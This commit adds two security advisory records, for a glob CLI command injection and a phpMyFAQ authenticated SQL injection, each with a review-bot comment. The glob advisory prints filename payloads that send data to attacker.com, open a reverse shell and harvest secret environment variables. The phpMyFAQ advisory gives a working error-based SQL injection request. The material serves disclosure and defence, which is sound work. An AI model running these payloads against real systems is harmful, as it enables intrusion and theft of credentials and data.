
Commit 8b8b77c

1 parent 2a455b6 commit 8b8b77c

2 files changed, +150 -0 lines changed

Lines changed: 64 additions & 0 deletions
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5j98-mcp5-4vw2",
4+
"modified": "2025-11-17T17:38:56Z",
5+
"published": "2025-11-17T17:38:56Z",
6+
"aliases": [
7+
"CVE-2025-64756"
8+
],
9+
"summary": "glob CLI: Command injection via -c/--cmd executes matches with shell:true",
10+
"details": "### Summary\n\nThe glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c <command> <patterns>` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.\n\n### Details\n\n**Root Cause:**\nThe vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`:\n\n```javascript\nstream.on('end', () => foregroundChild(cmd, matches, { shell: true }))\n```\n\n**Technical Flow:**\n1. User runs `glob -c <command> <pattern>` \n2. CLI finds files matching the pattern\n3. Matched filenames are collected into an array\n4. Command is executed with matched filenames as arguments using `shell: true`\n5. Shell interprets metacharacters in filenames as command syntax\n6. 
Malicious filenames execute arbitrary commands\n\n**Affected Component:**\n- **CLI Only:** The vulnerability affects only the command-line interface\n- **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected\n- **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems)\n\n**Attack Surface:**\n- Files with names containing shell metacharacters: `$()`, backticks, `;`, `&`, `|`, etc.\n- Any directory where attackers can control filenames (PR branches, archives, user uploads)\n- CI/CD pipelines using `glob -c` on untrusted content\n\n### PoC\n\n**Setup Malicious File:**\n```bash\nmkdir test_directory && cd test_directory\n\n# Create file with command injection payload in filename\ntouch '$(touch injected_poc)'\n```\n\n**Trigger Vulnerability:**\n```bash\n# Run glob CLI with -c option\nnode /path/to/glob/dist/esm/bin.mjs -c echo \"**/*\"\n```\n\n**Result:**\n- The echo command executes normally\n- **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell\n- A new file `injected_poc` is created, proving command execution\n- Any command can be injected this way with full user privileges\n\n**Advanced Payload Examples:**\n\n**Data Exfiltration:**\n```bash\n# Filename: $(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" > /dev/null 2>&1)\ntouch '$(curl -X POST https://attacker.com/exfil -d \"$(whoami):$(pwd)\" > /dev/null 2>&1)'\n```\n\n**Reverse Shell:**\n```bash\n# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)\ntouch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'\n```\n\n**Environment Variable Harvesting:**\n```bash\n# Filename: $(env | grep -E \"(TOKEN|KEY|SECRET)\" > /tmp/secrets.txt)\ntouch '$(env | grep -E \"(TOKEN|KEY|SECRET)\" > /tmp/secrets.txt)'\n```\n\n### Impact\n\n**Arbitrary Command Execution:**\n- Commands execute with full privileges of the user running glob CLI\n- No privilege escalation required - runs as current 
user\n- Access to environment variables, file system, and network\n\n**Real-World Attack Scenarios:**\n\n**1. CI/CD Pipeline Compromise:**\n- Malicious PR adds files with crafted names to repository\n- CI pipeline uses `glob -c` to process files (linting, testing, deployment)\n- Commands execute in CI environment with build secrets and deployment credentials\n- Potential for supply chain compromise through artifact tampering\n\n**2. Developer Workstation Attack:**\n- Developer clones repository or extracts archive containing malicious filenames\n- Local build scripts use `glob -c` for file processing\n- Developer machine compromise with access to SSH keys, tokens, local services\n\n**3. Automated Processing Systems:**\n- Services using glob CLI to process uploaded files or external content\n- File uploads with malicious names trigger command execution\n- Server-side compromise with potential for lateral movement\n\n**4. Supply Chain Poisoning:**\n- Malicious packages or themes include files with crafted names\n- Build processes using glob CLI automatically process these files\n- Wide distribution of compromise through package ecosystems\n\n**Platform-Specific Risks:**\n- **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing\n- **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL\n- **Mixed Environments:** CI systems often use Linux containers regardless of developer platform\n\n### Affected Products\n\n- **Ecosystem:** npm\n- **Package name:** glob\n- **Component:** CLI only (`src/bin.mts`)\n- **Affected versions:** v10.3.7 through v11.0.3 (and likely later versions until patched)\n- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd` option)\n- **Patched versions:** 11.1.0\n\n**Scope Limitation:**\n- **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe\n- **CLI-Specific:** Only the command-line interface with 
`-c/--cmd` option is vulnerable\n\n### Remediation\n\n- Upgrade to `[email protected]` or higher, as soon as possible.\n- If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead.\n- As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but ensure that no untrusted contents can possibly be encountered in the file path results.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "glob"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "10.3.7"
29+
},
30+
{
31+
"fixed": "11.1.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 11.0.3"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/isaacs/node-glob"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-78"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2025-11-17T17:38:56Z",
62+
"nvd_published_at": null
63+
}
64+
}
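Review bot: in the Remediation section of `details`, the upgrade target reads `[email protected]`, which is a mangled package spec (the version has been swallowed by an e-mail-style obfuscation) and tells the reader nothing; it should name the fixed version explicitly, e.g. "Upgrade to glob 11.1.0 or later", matching the `fixed` event and the "Patched versions: 11.1.0" line earlier in the same text. The remaining version data is consistent: `introduced` 10.3.7, `fixed` 11.1.0 and `last_known_affected_version_range` `<= 11.0.3` agree with the Affected Products section.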
Lines changed: 86 additions & 0 deletions
@@ -0,0 +1,86 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-fxm2-cmwj-qvx4",
4+
"modified": "2025-11-17T17:37:37Z",
5+
"published": "2025-11-17T17:37:37Z",
6+
"aliases": [
7+
"CVE-2025-62519"
8+
],
9+
"summary": "phpMyFAQ has Authenticated SQL Injection in Configuration Update Functionality",
10+
"details": "### Summary\n\nAn authenticated SQL injection vulnerability in the main configuration update functionality of phpMyFAQ (v4.0.13 and prior) allows a privileged user with 'Configuration Edit' permissions to execute arbitrary SQL commands. Successful exploitation can lead to a full compromise of the database, including reading, modifying, or deleting all data, as well as potential remote code execution depending on the database configuration.\n\n### Details\n\nThe vulnerability exists in the `save` method within the `src/phpMyFAQ/Controller/Administration/ConfigurationTabController.php` controller. This method handles the saving of application-wide configuration settings. It retrieves all submitted form data as an associative array via `$request->get('edit')`.\n\nThe core of the issue is that while the *values* of this array are processed, the *keys* are trusted implicitly and are not sanitized or validated.\n\n**File:** `src/phpMyFAQ/Controller/Administration/ConfigurationTabController.php`\n```php\n// ...\npublic function save(Request $request): JsonResponse\n{\n $this->userHasPermission(PermissionType::CONFIGURATION_EDIT);\n\n $configurationData = $request->get('edit');\n // ...\n \n foreach ($configurationData as $key => $value) {\n // The key from the user input is used to build the $newConfigValues array.\n $newConfigValues[$key] = (string) $value;\n // ...\n }\n\n // ...\n // The array, containing user-controlled keys, is passed to the model.\n $this->configuration->update($newConfigValues);\n\n return $this->json(['success' => Translation::get('ad_config_saved')], Response::HTTP_OK);\n}\n```\n\nThe `$newConfigValues` array, which contains user-controlled keys, is then passed to the `update` method in the `src/phpMyFAQ/Configuration.php` model. 
Here, the key (`$name`) is directly concatenated into a raw SQL query string.\n\n**File:** `src/phpMyFAQ/Configuration.php`\n```php\npublic function update(array $newConfigs): bool\n{\n // ...\n foreach ($newConfigs as $name => $value) {\n if ($name != 'main.phpMyFAQToken' && !in_array($name, $runtimeConfigs)) {\n // VULNERABLE CODE: The array key '$name' is not escaped and is directly\n // concatenated into the SQL query string. The value is escaped, but not the name.\n $update = sprintf(\n \"UPDATE %s%s SET config_value = '%s' WHERE config_name = '%s'\",\n Database::getTablePrefix(),\n $this->tableName,\n $this->getDb()->escape(trim($value)),\n $name\n );\n\n $this->getDb()->query($update);\n // ...\n }\n }\n\n return true;\n}\n```\nAn attacker can craft a malicious form parameter name (which becomes the array key) to break out of the single quotes in the `WHERE` clause and inject arbitrary SQL commands.\n\n### PoC (Proof of Concept)\n\n**Prerequisites:**\n1. A running instance of phpMyFAQ (v4.0.13 confirmed vulnerable).\n2. An authenticated user session with permissions to edit the configuration.\n\n**Execution:**\nDue to the application's CSRF protection, the easiest way to reproduce this is by capturing a legitimate request to save the configuration and modifying it using a proxy tool like Burp Suite's Repeater.\n\n1. Log in as an administrator and navigate to **Administration** -> **Configuration**.\n2. Make a trivial change (e.g., toggle a setting) and click \"Save configuration\". Capture this `POST` request to `/admin/api/configuration`.\n3. Send the captured request to Repeater. The request will contain a valid `Cookie` header and a `pmf-csrf-token` parameter.\n4. Modify the request body to inject a malicious key. 
Add a new `multipart/form-data` part with a crafted `name` attribute.\n\n**Example Malicious Request Body Part (Error-Based):**\n\n```\n------WebKitFormBoundaryRandomString\nContent-Disposition: form-data; name=\"edit[dummykey' and updatexml(1, concat(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT 0, 1), 0x7e), 1) and '1]\"\n\ntrue\n------WebKitFormBoundaryRandomString\n```\n*Note: You must also include the `pmf-csrf-token` part from the original request in the body.*\n\n**Result:**\nThe server will respond with a `500 Internal Server Error`, and the body of the response will contain a database error message, confirming the SQL injection. The leaked data will be present within the error string.\n\n```\nAn error occurred: XPATH syntax error: '~faq_faqadminlog~' at line 311 at /var/www/html/src/phpMyFAQ/Database/Mysqli.php\n```\n\nThis error confirms the successful execution of the injected `updatexml` payload, which has extracted and revealed the name of the first table in the database (`faq_faqadminlog`). Time-based blind techniques can also be used to extract data without relying on error messages.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "thorsten/phpmyfaq"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.0.14"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 4.0.13"
38+
}
39+
},
40+
{
41+
"package": {
42+
"ecosystem": "Packagist",
43+
"name": "phpmyfaq/phpmyfaq"
44+
},
45+
"ranges": [
46+
{
47+
"type": "ECOSYSTEM",
48+
"events": [
49+
{
50+
"introduced": "0"
51+
},
52+
{
53+
"fixed": "4.0.14"
54+
}
55+
]
56+
}
57+
],
58+
"database_specific": {
59+
"last_known_affected_version_range": "<= 4.0.13"
60+
}
61+
}
62+
],
63+
"references": [
64+
{
65+
"type": "WEB",
66+
"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-fxm2-cmwj-qvx4"
67+
},
68+
{
69+
"type": "PACKAGE",
70+
"url": "https://github.com/thorsten/phpMyFAQ"
71+
},
72+
{
73+
"type": "WEB",
74+
"url": "https://github.com/thorsten/phpMyFAQ/compare/4.0.13...4.0.14"
75+
}
76+
],
77+
"database_specific": {
78+
"cwe_ids": [
79+
"CWE-89"
80+
],
81+
"severity": "HIGH",
82+
"github_reviewed": true,
83+
"github_reviewed_at": "2025-11-17T17:37:37Z",
84+
"nvd_published_at": null
85+
}
86+
}
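Review bot: the `references` array links only the advisory, the repository and the `4.0.13...4.0.14` compare range; since `details` pins the root cause to the unvalidated `$name` key being concatenated into the `UPDATE` statement in `src/phpMyFAQ/Configuration.php`, a reference to the specific fixing commit, plus a sentence in `details` stating whether 4.0.14 validates keys against the known configuration names or escapes them, would let consumers verify the fix instead of diffing a whole release. Minor: the two `affected` entries (`thorsten/phpmyfaq` and `phpmyfaq/phpmyfaq`) carry identical ranges and `last_known_affected_version_range` values, which is fine if both Packagist names are published, but the second name should be confirmed to exist.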
